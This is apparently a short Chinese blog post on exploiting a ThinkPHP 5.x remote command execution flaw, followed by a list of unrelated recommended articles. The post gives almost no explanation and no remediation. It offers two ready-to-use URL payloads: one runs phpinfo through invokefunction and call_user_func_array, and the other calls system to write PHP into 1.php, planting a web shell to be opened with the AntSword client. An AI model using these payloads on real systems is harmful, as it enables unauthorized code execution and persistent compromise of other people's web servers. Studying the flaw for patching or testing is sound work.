常见框架漏洞:Thinkphp(TP)篇

与神明画鸭2025-03-26 7:04

简介

ThinkPHP (简称 TP )是一款流行的 国产开源 PHP 框架 ,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

复制代码 
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

复制代码 
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可

相关推荐
智云软件测评服务4 天前
测评机构如何通过漏扫保障软件安全?扫描范围与局限解析
渗透·漏洞·扫描
Think Spatial 空间思维7 天前
【安全攻防与漏洞】HTTPS中的常见攻击与防御
网络协议·安全·https·漏洞·攻防·防御
kp0000013 天前
PHP弱类型安全漏洞解析与防范指南
android·开发语言·安全·web安全·php·漏洞
智云软件测评服务16 天前
系统漏洞扫描服务:维护网络安全的关键与服务原理?
漏洞·扫描·潜在
huohuopro18 天前
thinkphp模板文件缺失没有报错/thinkphp无法正常访问控制器
后端·thinkphp
智云软件测评服务25 天前
主机漏洞扫描:如何保障网络安全及扫描原理与类型介绍?
漏洞·主机·扫描
智云软件测评服务1 个月前
数字化时代下,软件测试中的渗透测试是如何保障安全的?
渗透·测试·漏洞
ybdesire1 个月前
Jinja2模板引擎SSTI漏洞
网络·人工智能·安全·web安全·大模型·漏洞·大模型安全
汤米粥2 个月前
FastAdmin和thinkPHP学习文档
学习·thinkphp·fastadmin
掘金归海一刀2 个月前
thinkphp6+elementui实现多图片压缩包下载
前端·vue.js·thinkphp
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】03从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑04DeepSeek各版本说明与优缺点分析05【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!06组基轨迹建模 GBTM的介绍与实现(Stata 或 R)07Coze扣子平台完整体验和实践(附国内和国际版对比)08VMware虚拟机安装Win7专业版保姆级教程(附镜像包)09苍穹外卖面试总结10ImageJ软件使用教程(二):图像测量